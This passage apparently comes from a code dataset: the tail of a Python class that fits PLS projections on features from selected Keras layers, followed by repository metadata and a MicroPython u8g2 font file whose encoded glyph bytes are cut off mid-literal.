model=None, layers=None, batch_size=32):
self.n_comp = n_comp
self.dm_layer = []
self.dm_method = dm_method
self.oaa = oaa
self.as_network = as_network
self.model = self.custom_model(model=model, layers=layers)
self.layers = layers
self.batch_size = batch_size
def custom_model(self, model, layers):
for i in range(0, len(model.layers)):
if i > layers[-1]:
model.layers.pop()
outputs = []
for i in layers:
layer = model.get_layer(index=i)
outputs.append(Flatten()(layer.output))
outputs = concatenate(outputs)
model = Model(model.input, outputs)
return model
def pls_as_network(self):
pls_into_fc = []
id = 0
for i in range(0, len(self.dm_layer)):
dm = self.dm_layer[i]
id = id + 1
w = dm.x_rotations_
x_mean = dm.x_mean_
x_std = dm.x_std_
H = self.model.get_layer(index=-1).output
H = Lambda(lambda x: (x - x_mean) / x_std)(H)
H = Dense(self.n_comp, weights=[w],
use_bias=False,
trainable=False,
name='pls_model_{}'.format(id))(H)
pls_into_fc.append(H)
H = None
H = concatenate(pls_into_fc)
self.model = Model(self.model.input, H)
for i in range(0, len(self.model.layers)):
self.model.layers[i].trainable = False
return self
def fit(self, X, y):
if X.shape[0] != y.shape[0]:
            raise ValueError("X and y must contain the same number of samples")
# if np.unique(y).shape[0] == 2:
# self.oaa = False
self.dm_layer = []
dm_template = PLSRegression(n_components=self.n_comp)
X = self.model.predict(X)
y_tmp = np.argmax(y, axis=1)
num_classes = np.unique(y_tmp)
if self.oaa:
for c in num_classes:
target = np.ones(y_tmp.shape)
target[y_tmp != c] = -1
dm = copy.copy(dm_template)
dm.fit(X, target)
self.dm_layer.append(dm)
del dm
else:
dm = copy.copy(dm_template)
dm.fit(X, y)
self.dm_layer.append(dm)
del dm
if self.as_network:
self.pls_as_network()
return self
def transform(self, X):
proj_x = None
X = self.model.predict(X)
for pls_model in self.dm_layer:
if proj_x is None:
proj_x = pls_model.transform(X)
else:
proj_tmp = pls_model.transform(X)
proj_x = np.column_stack((proj_x, proj_tmp))
return proj_x | 31.146018 | 78 | 0.517971 | 886 | 7,039 | 3.914221 | 0.120767 | 0.046713 | 0.044406 | 0.031719 | 0.846597 | 0.836505 | 0.816897 | 0.775375 | 0.775375 | 0.741061 | 0 | 0.008291 | 0.383151 | 7,039 | 226 | 79 | 31.146018 | 0.790419 | 0.007245 | 0 | 0.775862 | 0 | 0 | 0.010501 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057471 | false | 0 | 0.057471 | 0 | 0.183908 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a91e2e2b7eba484c8912a42f98bb0071f4ad2484 | 49,481 | py | Python | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 6 | 2020-02-27T11:17:54.000Z | 2020-12-04T10:14:26.000Z | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 4 | 2020-07-29T14:07:04.000Z | 2021-05-19T05:10:33.000Z | u8g2/luRS18_te.py | tve/mpy-lib | 9f102459c61a5be424291a277e421bd1fc16843a | [
"MIT"
] | 3 | 2020-05-16T08:15:16.000Z | 2021-09-30T10:39:37.000Z | data=b'\xbe\x00\x04\x03\x05\x05\x05\x06\x06\x28\x25\xf0\xf7\x12\xfb\x12\xfc\x02\xeb\x06\x3a\x12\xe9\x20\x06\x00\xc0\x10\x05\x21\x09\x42\x4e\x10\x85\x0f\x8a\x0c\x22\x09\xc6\x48\x36\x05\x11\x3e\x11\x23\x2b\x4f\x42\x10\x36\x19\x41\x19\x41\x11\x41\x19\x41\x19\xa1\x83\x8b\x83\x2b\x11\x41\x19\x41\x19\x41\x11\xa9\x83\x8b\x83\x23\x19\x41\x91\x41\x11\x41\x19\x41\x19\x31\x00\x24\x29\xcb\x4a\x0f\x2e\x49\xb9\x9b\x03\x89\x09\x29\x11\x29\x11\x29\x11\x31\x09\xb1\xc2\x49\xba\x32\x89\x29\x11\x29\x11\x29\x91\x21\x89\x03\x93\x83\x38\x49\x21\x00\x25\x30\x51\x42\x30\x16\xc2\x09\xb3\x89\x91\x29\x11\x21\x35\x42\x32\x42\x23\xab\x4c\xe6\x48\xc6\x25\x28\x25\xec\x4c\xa6\x26\x84\x84\x46\x84\xd4\x08\xc9\x08\x29\x91\x1a\x99\x18\xb3\x18\x24\x01\x26\x28\x50\x46\x30\x36\x5a\xcb\x19\xc1\x19\xc1\x19\xc1\x91\x49\x87\x47\x13\x23\x43\x46\x33\x56\x23\x12\x63\x22\x12\x63\x16\x64\x34\x54\x53\x07\x12\x62\x35\x04\x27\x0b\xc4\x44\xd6\x84\x83\x0a\x11\x15\x00\x28\x16\xc6\x46\x0e\xad\x20\x19\x99\x19\x99\x19\x99\xfd\x91\xd0\x90\xd0\x90\x94\x54\x00\x29\x16\xc6\x46\x0e\x85\x28\x45\x43\x42\x43\x42\x33\xfb\x8d\xcc\x8c\xcc\x8c\xa2\x28\x00\x2a\x18\x29\xc9\x94\xa5\xc0\xa8\x90\x18\x8a\x88\x11\x09\xa9\x88\x28\x09\x19\x99\xa0\x18\x09\x00\x2b\x0e\xee\x45\x10\x36\x61\x3d\x3b\xf8\x4c\x58\x9f\x01\x2c\x0c\x03\xc9\x0d\x85\x03\x09\x15\x14\x12\x00\x2d\x08\x45\xc8\x13\x85\x83\x01\x2e\x08\x63\x48\x10\x85\x03\x01\x2f\x1d\xcc\x42\x8e\x55\x49\x51\xc9\x49\xc9\x49\x51\x49\x51\x49\x51\x49\x51\x49\x51\xc9\x49\xc9\x49\x51\x49\x51\x00\x30\x19\x4d\x46\x10\xa6\xba\xab\x99\x55\x23\x53\x13\x73\xfe\xdd\xc4\xd4\xc8\xd4\xcc\xaa\xbb\x22\x00\x31\x0b\x46\x4e\x10\x86\x83\x9a\xfd\xff\x01\x32\x19\x4b\x4a\x10\x16\x9b\x83\x09\xa9\xc9\xc1\xed\x06\xe7\xc6\xc8\xe6\x06\x05\xe7\x06\x0f\x1e\x04\x33\x1a\x4b\x4a\x10\x8e\x9b\x83\x09\x29\xc2\x0d\xe5\xa4\xca\x0e\x29\x07\x17\x52\x51\x1c\x88\x1c\xc4\x00\x34\x1d\x4c\x4a\x10\xbe\xc9\x41\xba\x3a\x09\x31\x11\xa9\x11\xa1\x19\x21\x35\x52\x22\x53\x22\x07\x0f\x06\x45\x75\x02\x35\x13\x49\x4e\x10\x86\x07\x76\xda\x15\x9d\x31\xdb\x55\x0d\xc5\x89\x0d\x00\x36\x21\x4c\x4a\x10\x26\xab\x83\x98\xa9\x90\xc9\xc1\xc9\x25\x34\x13\x17\x35\x13\x63\xce\x26\xc4\x26\xa6\x46\x66\x66\x0e\xc2\x6a\x00\x37\x17\x4c\x4e\x10\x86\x0f\x26\x27\x55\x4e\x4a\x0e\x4e\x4a\x0e\x4e\x0e\x4e\x2e\x9c\x1c\x04\x38\x22\x4c\x4a\x10\xa6\xb2\xa3\x99\x19\x29\x19\x29\x19\x29\x99\x19\x29\x33\xab\x83\x98\x91\x8a\xa9\x33\x67\x13\x43\x23\x07\x52\x36\x00\x39\x21\x4c\x4a\x10\x9e\xb2\x83\x98\x19\x92\xa1\x89\x31\x89\x31\x67\x57\x13\x33\x25\x16\x33\x24\x93\x92\x4b\xa2\x66\x0e\x82\xac\x00\x3a\x0b\xa3\x49\x10\x85\x03\x79\xb0\x03\x01\x3b\x0e\x43\xca\x0d\x85\x03\x79\x48\x0b\x15\x14\x21\x00\x3c\x10\xee\x45\x10\xee\xd8\xc9\xba\x86\x1c\xb3\x6d\x4b\x3c\x1d\x3d\x0a\xce\x44\x12\x86\xdf\x43\x1f\x7c\x3e\x12\xee\x45\x10\x86\xe8\x61\xda\xb6\xc4\x0c\x19\xd6\xb5\x9c\x8d\x06\x3f\x15\x4a\x42\x70\x0d\x9b\x03\x89\x28\xba\xcd\xe6\xd4\x8d\xcd\xad\x07\x9e\x5b\x04\x40\x35\x54\x4e\xb0\xc6\xdb\x03\xba\x2a\xaa\xd1\x99\x21\x13\x19\x21\x23\x09\x21\xa1\x20\x09\x19\x21\x21\xa2\xa0\x21\x1a\x21\x29\x1a\x99\x21\x09\x19\x91\x10\x91\x09\x99\x12\x1b\x55\xeb\x61\xc8\x42\x0f\x86\x2d\x01\x41\x24\x51\x42\x30\xbe\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\x42\x22\x4b\x4a\xd0\x85\xa3\x03\x91\x19\x8a\xa1\x89\xa1\x89\xa1\x89\x99\x91\x19\x99\xa3\x03\x91\x19\x8a\xa1\x2b\x8f\x0e\x2e\x0e\x62\x00\x43\x1c\x4f\x46\x30\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x08\x01\x44\x1f\x4f\x
4a\x70\x86\x83\xa9\x83\x9a\x31\x92\x39\x8a\xc1\x89\xc1\x4b\x7f\x29\x31\x38\x31\x37\x32\x46\x72\x40\x74\x20\x06\x45\x16\x4b\x4a\xd0\x85\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\x46\x11\x4b\x4a\xb0\x85\x0f\x08\xf7\xf0\x60\xe2\x60\x62\x70\x3f\x04\x47\x1f\x4f\x46\x50\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x5d\x5a\x1e\x4e\x0c\x4e\xd0\x8d\x54\xcd\x1c\x54\x1d\x84\x00\x48\x0f\x4e\x4a\x50\x86\x41\xff\xf0\xe0\x03\x43\xff\x70\x00\x49\x09\x43\x4a\xf0\x84\xff\xa0\x00\x4a\x0d\xc8\x3e\x0e\xad\xfd\xff\x8f\x26\x4c\x6a\x00\x4b\x27\x4e\x4a\x10\x86\xb9\x89\x31\x99\xa9\x99\xa1\x45\x52\x33\x62\x23\x63\x13\x73\x86\x77\x13\x64\x23\x54\x33\x44\x43\x34\x43\x34\x53\x24\x63\x14\x73\x04\x4c\x0d\x4b\x4a\xb0\x85\xc1\xfd\xff\xf0\xe0\x41\x00\x4d\x31\x51\x4a\xd0\x06\xca\x83\xc8\x03\xc1\x03\xb9\x83\xb9\x8b\xa9\x83\x88\x29\x89\x8a\x29\x89\x92\x19\x91\x92\x19\x91\x12\x12\x91\x9a\x09\x99\x9a\x09\x99\x1a\x9b\x22\xa2\x22\xa2\x22\xa2\xe2\x01\x4e\x22\x4e\x4a\x70\x86\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\x4f\x1f\x51\x46\x70\xae\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\x50\x16\x4b\x4a\xd0\x85\x03\x91\x83\x89\xa1\x2b\x1f\xdd\x50\x1c\x88\x1c\x0d\xee\x43\x00\x51\x2e\xd3\x46\x6e\xae\xd3\x03\x3a\x2a\x76\x53\x93\x43\x93\x33\xb3\x23\xb3\x23\xb3\x23\xb3\x23\xb3\x23\xb3\x33\x93\x34\x93\x43\x74\x54\xec\x0e\x48\xef\x61\xe8\x21\xce\xe9\x41\x24\x00\x52\x27\x4d\x4a\x10\x86\x83\xa8\x83\x99\x21\x92\xa9\x91\xa9\x91\xa9\x91\xa9\x91\xa1\x99\x45\x67\x07\x51\x23\x44\x33\x43\x6b\x86\x48\xa6\x28\xc6\x26\xc6\x08\x53\x19\x4b\x46\xb0\x1d\x9b\x03\x91\x21\x89\xc1\x85\x75\x75\x76\x85\x0c\x17\x56\x4d\x1c\xc8\xdc\x00\x54\x0d\x4f\x42\x10\x86\x1f\x88\x0d\xef\xff\x67\x00\x55\x11\x4d\x4a\x30\x86\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\x56\x26\x50\x42\x10\x86\xd9\x52\x91\x49\x91\x49\x11\x3a\xa1\x39\xa1\xb1\xa9\x29\xb1\x29\x31\x1a\xc1\x19\xc1\x19\x41\x0a\xd1\x09\x51\x5b\x62\xe2\x39\x00\x57\x3c\x55\x42\xb0\x86\xb1\xb9\xb2\x31\x33\x2a\x91\xa1\x2a\x91\xa1\x2a\x91\xa1\x22\x99\x21\x89\x19\xa1\x19\x89\x19\xa1\x11\x91\x19\xa1\x11\x91\x11\xa9\x11\x11\x0a\xb1\x09\x99\x09\xb1\xa2\x09\xb1\xa2\xba\xa2\x42\x2a\x42\xaa\xc9\xb1\x29\x00\x58\x24\x4f\x42\x10\x06\xc2\x09\xb2\x99\x31\x21\x22\x31\x92\xb9\x11\x41\xd3\xda\x61\xd2\xca\x43\x11\x32\xa1\xa9\x21\x22\x31\x12\xc1\x89\x41\x02\x59\x1a\x4f\x42\x10\x86\xc9\x89\x41\x11\x32\xa1\x31\x21\x22\xb1\x99\x31\x12\xc1\xcb\x52\xe2\xfd\x19\x00\x5a\x19\x4d\x46\xf0\x8d\x83\x8a\x83\x4a\xca\x95\x84\x94\x93\x84\x94\x93\x84\x2c\x27\x29\x0f\x1e\x14\x5b\x0d\xc5\x4a\x0e\x85\x83\x1a\xfd\xff\x9b\x83\x01\x5c\x1a\xcc\x42\x8e\x05\x59\x51\xd1\x51\xd1\x51\xb5\xa2\xb2\xa2\xb2\xa2\xb2\xa2\xa2\xa3\xa2\xa3\x6a\x05\x5d\x0d\xc5\x46\x0e\x85\x83\x19\xfd\xff\x9b\x83\x02\x5e\x1d\xee\xc5\x11\xbe\x60\xb5\xa4\x94\x86\x22\x72\x23\x63\x42\x52\x43\x43\x62\x42\x62\x32\x82\x22\x82\x12\xa2\x02\x5f\x08\x4a\x44\xaf\x85\x07\x06\x60\x09\x85\x54\xf7\x85\x19\x21\x05\x61\x1b\xac\x45\xd0\x1d\xa3\x03\x99\xa8\xc9\x55\x37\x07\x22\x34\x23\x43\x23\x43\x23\x33\x34\x16\x24\x34\x03\x62\x19\x4c\x4a\x10\x86\xc9\x3d\xa1\x99\xb8\xa8\x99\x98\x3a\xf3\xab\x09\x1a\x8a\x83\x11\x91\x1a\x00\x63\x15\xab\x45\xb0\xa5\x93\x03\x09\xaa\x88\xb9\xc1\x5d\x0e\x52\x85\x1c\x08\x59\x00\x64\x19\x4c\x46\x10\xce\xbd\x21\x19\x39\x98\xa0\xa1\x98\x32\xf3\xd9\xd5\xc4\x4c\xc5\xc5\x0c\xc9\x00\x65\x15\xab\x45\xd0\x9d\xaa\x9b\x25\x52\x56\x07\x1f\x4e\x0e\x52\x85\x1c\x08\x59\x00\x66\x14\x8a\x42\x30\xad\x9a\x9b\x99\x90\xb9\xad\x0e\x42\x0e\x82\xe6\xf6\x5f\x01\x67\x1e\x4c\xc6\
x0d\x1e\x92\x91\x83\x09\x1a\x8a\x29\x33\x3f\x9b\x98\xa9\xb8\x98\x21\x99\x9c\x14\x09\x1b\x39\x10\xba\x01\x68\x11\x4b\x4a\x10\x86\xc1\x3d\x21\x99\xb0\xa8\x39\xb2\xf2\x5f\x0d\x69\x0b\x43\x4a\xf0\x84\x03\xb1\x83\x1f\x10\x6a\x11\xe8\xbe\x0d\xad\xed\xc1\xa6\xf6\xff\x8a\x66\xe2\xa2\x06\x00\x6b\x1f\x4c\x4a\xf0\x85\xc9\xbd\x9a\x18\x1a\x99\x59\x32\x34\x22\x35\x21\x76\x35\x41\x34\x51\x33\x42\x33\x43\x32\x44\x31\x45\x6c\x09\x43\x4a\xf0\x84\xff\xa0\x00\x6d\x23\xb3\x49\xf0\x86\x91\x1a\x92\x09\x13\x8b\x9a\x92\x83\x20\x22\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x29\xab\x05\x6e\x10\xab\x49\x10\x86\x11\x92\x09\x8b\x9a\x23\x2b\xff\xd5\x00\x6f\x17\xad\x45\xf0\xa5\xb2\x03\x19\x26\x53\x13\x73\xbe\x9b\x98\x1a\xa1\xa1\x39\x10\x2b\x02\x70\x1a\x4c\xca\x0d\x86\x11\x9a\x89\x8b\x9a\x89\xa9\x33\xbf\x9a\xa0\xa1\x38\x18\x19\xa1\x99\xdc\x25\x00\x71\x19\x4c\xc6\x0d\x1e\x92\x91\x83\x09\x1a\x8a\x29\x33\x9f\x5d\x4d\xcc\x54\x5c\xcc\x90\x4c\xee\x01\x72\x0f\xa8\x49\x50\x85\x11\x8b\x03\x19\xa2\xa9\xfd\x15\x00\x73\x15\xa9\x49\xb0\x15\x93\x8b\xa1\x88\x31\xaa\x9b\x23\xb3\x31\xa2\x83\x12\x13\x00\x74\x10\x08\x46\x30\x95\xa9\x35\x07\x07\x22\x53\xfb\xb3\x22\x02\x75\x0f\xab\x49\x10\x86\x29\xff\xa3\x9b\x0a\x8b\x11\x92\x01\x76\x1b\xad\x41\xb0\x85\x39\x3b\x91\x31\x91\x29\x19\x22\xa1\x99\xa1\x19\xb1\x11\xb1\x09\x39\x43\x4a\x56\x00\x77\x31\xb3\x41\x70\x06\xb1\x31\x09\xa9\x29\x11\xa9\x29\x11\x21\x09\x21\x11\x21\x09\x19\x21\x19\x09\x19\x21\x11\x91\x11\x21\x11\x19\x09\x31\x09\x19\x09\x31\x22\x09\x31\xaa\x39\xaa\x41\xb1\x21\x00\x78\x1c\xad\x45\xf0\x85\xb9\x89\xa9\x99\x55\x23\x72\x12\x83\x94\x93\x75\x13\x72\x32\x52\x42\x33\x53\x13\x73\x03\x79\x21\x4d\xc2\xad\x85\x41\x33\x91\x31\x91\xa9\x11\x22\xa1\x21\x21\x12\xb1\x11\xb1\x09\x39\xc3\x42\xd2\x51\x59\xd1\x51\xd1\x39\x00\x7a\x10\xab\x49\xd0\x85\x0f\x02\x35\x9c\xdb\x50\xe1\xc1\x83\x00\x7b\x11\xc6\x42\x0e\x25\x99\x11\x21\xfd\x64\x66\x4a\x48\xbf\x1a\x12\x7c\x08\xc2\x4a\xee\x84\x7f\x20\x7d\x12\xc6\x4a\x0e\x05\xa1\x29\x21\xfd\x6a\x66\x44\x48\x3f\x99\x11\x02\x7e\x14\xce\x44\x12\x96\x39\x09\x2b\x09\x91\x21\xa2\x11\x09\x29\x0b\xb9\x11\x00\xa0\x06\x00\xc0\x10\x05\xa1\x0a\x42\xce\x0d\x05\xa3\x83\x07\x05\xa2\x27\x4a\x4e\x10\x2e\x41\x39\x93\x83\x88\x09\x91\x88\x09\x99\x11\x99\x11\x99\x11\x99\x11\x99\x11\x99\x11\xa1\x09\xa1\x09\x91\x90\x83\x18\x33\x41\x19\x00\xa3\x17\x4b\x4e\x10\xb6\xa2\x23\xa1\x98\xc1\x5d\x1d\x88\x1c\x48\x0d\x6e\xa8\xee\xe0\x41\x00\xa4\x26\x0f\xc2\x10\x8e\xd8\x88\xc9\x89\x89\x8a\x99\x03\xaa\x99\xa9\x45\x72\x42\x72\x42\x72\x42\x72\x42\x53\x6b\xa6\x0e\x68\x26\x2a\x56\x4e\xc4\x46\x00\xa5\x21\x4f\x46\x10\x06\xc2\x89\x41\x11\x32\x21\xa2\xa9\x99\x31\x12\xc1\xcb\x52\xc2\x83\xa9\x83\xc9\xc1\x83\xa9\x83\xc9\xe1\xcd\x00\xa6\x0b\xc2\x4a\xee\x84\x07\x84\x07\x07\x04\xa7\x25\xeb\xce\x0d\x9e\x93\x03\x11\xb1\x08\x49\xc9\xc1\xba\xa3\x83\x10\x99\x0a\x29\x3b\x2b\x89\x1a\x89\x03\x21\x43\xca\x49\x49\xb2\x03\x93\x1b\x00\xa8\x09\x47\x50\xf8\x05\x19\x1a\x01\xa9\x2e\x53\x46\xb0\x36\xdb\x03\x3a\x2a\xaa\xc9\x99\x19\xa2\x11\x19\x23\x09\x21\x99\xa0\x1a\x51\x1a\x51\x1a\x51\x1a\x51\x22\x99\xa0\x09\x19\x23\x91\x99\x9a\x95\x53\xec\x0e\x48\xed\x00\xaa\x15\x49\x45\x74\x0d\x9b\x93\x98\x39\x19\x93\x8b\x19\x09\x21\x89\x03\x09\x8a\x01\xab\x1a\x6b\xc5\xb0\x25\x99\xa0\x91\x6d\x44\x66\xd4\x8c\x0c\xc9\x48\x89\x0c\x8d\x0c\x8d\x0c\xc9\x44\x00\xac\x09\xce\x44\x12\x86\x1f\xeb\x00\xad\x08\x45\xc8\x13\x85\x83\x01\xae\x16\x6b\xc9\x13\x9e\xaa\x9b\x15\x07\x16\x2a\x98\x50\x90\x5c\x54\xcc\xcc\x5c\xd5\x00\xaf\x07\x47\x50\xf8\x85\x07\xb0\x0c\x84\x44\xf7\x0c\x89\x10\x91\x08\x09\x00\xb1\x10\xee\x45\x10\x36\x61\x9d\x1d\x7c\x26\xac\x3d
\xa2\x83\x0f\xb2\x10\x67\x81\x33\x8d\x8a\x83\x98\x29\xa1\x99\x8d\x84\x0e\x0e\xb3\x13\x67\x81\x33\x8d\x8a\x83\x20\x29\x09\x1a\x3a\xa9\x99\x83\x83\x10\x00\xb4\x09\x85\x58\xf7\x95\x11\x6d\x00\xb5\x11\x2b\x4a\x0e\x86\x29\xff\xa3\x9b\x83\x8a\x03\x11\xc3\x0d\x01\xb6\x32\xca\x4e\x0e\x96\x83\x88\x83\x03\x89\x03\x89\x03\x89\x03\x09\x09\x0b\x09\x0b\x19\x0a\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x29\x09\x01\xb7\x08\x63\x58\x13\x86\x03\x01\xb8\x0b\xa4\xd8\xed\x0d\x91\x20\x91\x0a\x00\xb9\x0a\x64\x81\x33\x85\x83\x10\xfd\x03\xba\x12\x49\x45\x74\x95\x9a\x13\x91\x09\xa1\x8e\x26\x44\x46\x6e\x4a\x00\xbb\x19\x6b\xc5\xb0\x8d\x18\xa1\x91\xa1\x91\xa1\x11\x29\x19\xa1\x91\x19\x35\x23\x32\x23\xdb\x28\x02\xbc\x33\x52\x56\x90\x06\xca\x11\xc2\x29\x41\x31\x39\x65\x73\x52\x83\x52\x92\x42\x42\x33\x32\x33\x34\x22\x43\x34\x22\x42\x12\x62\x42\x13\x52\x33\x23\x42\x43\x07\x31\x52\x07\x21\xb2\x22\xb3\x12\xc3\x12\x00\xbd\x2e\x51\x56\x90\x06\xca\x09\xc2\x21\x41\x29\x39\x31\xb1\x31\xa9\x39\x29\x41\x21\x89\x1a\x99\x83\x11\x91\x89\x98\x11\x75\x52\x72\x43\x63\x43\x63\x53\x62\x53\x72\x52\x63\x07\x73\x07\xbe\x35\x52\x56\x90\x8e\xba\x91\xab\x99\x20\x29\x49\x21\x31\xaa\x31\xa2\x59\x11\x61\x09\xa1\x89\x18\x1b\x8a\x03\x21\x8a\x0a\x21\x09\x31\xa1\x09\xa9\x99\x11\xa1\xa1\x83\x18\xa9\x83\x10\x59\x91\x59\x89\x61\x09\x00\xbf\x16\x4a\xc2\x6d\xa5\xb9\xf5\xc0\x73\xcb\xd6\xc9\x8d\xcd\xad\xa3\x8a\x38\x90\xb1\x00\xc0\x2c\xf1\x42\x30\xae\x79\x00\x79\x08\x79\x08\x79\x14\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\xc1\x27\xf1\x42\x30\xce\x71\xed\x91\x8c\x13\x37\x96\x18\x15\x19\x15\x21\x9c\x19\x14\x1a\x94\x1a\x13\x1b\x3b\x28\x3a\x30\x12\x1c\x92\x1c\x11\x1d\x11\x35\x1e\xc2\x2b\xf1\x42\x30\x3e\x6a\x62\x11\x51\x21\x79\xe8\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc3\x2b\xd1\x42\x30\xb6\x99\xc8\x83\x48\x91\x79\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc4\x29\xb1\x42\x30\x2e\x19\x51\x19\x79\xf0\x71\xe2\xc6\x12\xa3\x22\xa3\x22\x84\x33\x83\x42\x83\x52\x63\x62\x63\x07\x45\x07\x46\x82\x43\x92\x23\xa2\x23\xa2\xc6\x03\xc5\x2b\xf1\x42\x30\x46\xf1\x90\xe8\x90\x70\x79\x14\xe3\xc4\x8d\x25\x46\x45\x46\x45\x08\x67\x06\x85\x06\xa5\xc6\xc4\xc6\x0e\x8a\x0e\x8c\x04\x87\x24\x47\x44\x47\x44\x8d\x07\xc6\x2f\x56\x42\xf0\xd6\x03\xda\x03\xd2\x7a\x08\x7b\x08\x89\x79\x80\x89\x79\x00\x91\x71\x99\xe9\x99\x03\x39\xa1\x03\xb1\xa1\xe1\x83\xd9\x03\x5a\xb1\x51\xb9\xc9\xb9\x49\xc1\x83\xc3\x03\x02\xc7\x22\xef\xc6\x2d\xb6\x83\xa8\x03\x92\x32\x91\xd9\xe1\xd9\xe1\x3d\x26\x1e\xa6\x0c\xa9\x9a\x39\xa8\x3a\x88\x0c\x8f\x07\x90\x96\x1d\x03\xc8\x1a\xeb\x4a\xd0\x95\x49\x51\xf5\x00\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\xc9\x19\xeb\x4a\xd0\xad\x41\xed\x41\x0e\x26\x0e\x26\x06\xf7\xf0\x40\xe4\x40\x64\x70\x0f\x0f\x1e\x04\xca\x1b\xeb\x4a\xd0\x1d\x3a\x32\x11\x21\xd5\x07\x13\x07\x13\x83\x7b\x78\x20\x72\x20\x32\xb8\x87\x07\x0f\x02\xcb\x1a\xab\x4a\xd0\x0d\x19\x21\x19\xf1\x83\x89\x83\x89\xc1\x3d\x3c\x10\x39\x10\x19\xdc\xc3\x83\x07\x01\xcc\x0d\xe5\x52\xf0\x84\x19\x21\x75\x23\xfb\xff\x07\xcd\x0d\xe5\x4a\xf0\x94\x11\x0d\x47\xf6\xff\x4f\x00\xce\x11\xe8\x52\xf0\x14\x22\x1a\x11\x09\x21\xd1\xa9\xfd\xff\x1b\x00\xcf\x0e\xa7\x52\xf0\x04\x19\x1a\xc9\xa1\xfd\xff\x13\x00\xd0\x2b\x52\x42\x70\x9e\x83\xc1\x83\xb2\x31\xaa\x39\xa2\xc1\xa1\x41\x9a\xc9\x99\xc9\x03\xab\x03\xab\x99\xc9\x99\xc9\x99\x49\xa1\xc1\xa1\xb9\xa
9\x31\xaa\x03\xba\x03\x31\x00\xd1\x29\xce\x4a\x70\xa6\x99\xb0\x83\x30\x91\x79\x98\x49\x43\xc3\xbb\x83\x30\x8a\x31\x0a\x2a\x12\x22\x9a\x21\xa2\x19\x22\x12\x2a\x0a\xb2\x09\xb2\x83\xb8\x43\x97\x03\xd2\x27\xf1\x46\x70\xae\x79\x00\x79\x08\x79\x08\x79\xf0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd3\x23\xf1\x46\x70\xce\x71\xed\x11\x1c\x1e\x50\xb1\xa1\x23\x99\x1c\x99\x9c\x98\xf5\xdb\x89\xc9\x91\xc9\x11\x3a\x1a\x2a\xaa\x03\xc2\x2b\x00\xd4\x26\xf1\x46\x70\x3e\x6a\x62\x11\x51\x21\x79\xd8\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd5\x26\xd1\x46\x70\xb6\x99\xc8\x83\x48\x91\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd6\x24\xb1\x46\x70\x2e\x19\x51\x19\x79\xe0\xc3\x03\x2a\x36\x74\x24\x93\x23\x93\x13\xb3\x7e\x3b\x31\x39\x32\x39\x42\x47\x43\x45\x75\x40\x78\x05\xd7\x22\xee\x45\x10\x8e\xd0\x88\xc1\x89\xb1\x99\xa1\xa9\x91\x39\x11\x49\x5a\x59\x4a\x11\xb9\x91\xa9\xa1\x99\xb1\x89\xc1\x89\xd0\x08\x00\xd8\x2c\x51\x46\x70\xae\x93\x99\x03\x1b\x2a\x1a\x3a\x92\xb9\x92\x31\x8b\xb1\x11\xab\x19\x2b\x21\x23\x29\x9b\x29\x93\xb1\x09\xb3\x91\xba\x11\x3a\x1a\x2a\x9a\x03\x9b\x91\x2b\x00\xd9\x15\xed\x4a\x30\x9e\x59\x61\xf5\x30\x83\xfd\x7f\x68\x36\x41\x34\x73\x20\x75\x03\xda\x15\xed\x4a\x30\xbe\x51\xed\x81\x06\xfb\xff\xd0\x6c\x82\x68\xe6\x40\xea\x06\x00\xdb\x18\xed\x4a\x30\x2e\x4a\x42\x11\x31\x21\x79\x80\xc1\xfe\x3f\x34\x9b\x20\x9a\x39\x90\xba\x01\xdc\x15\xad\x4a\x30\x1e\x65\x32\xf2\x10\x83\xfd\x7f\x68\x36\x41\x34\x73\x20\x75\x03\xdd\x1d\xef\x42\x10\xc6\x61\xed\xe1\x26\x27\x06\x45\xc8\x84\xc6\x84\x8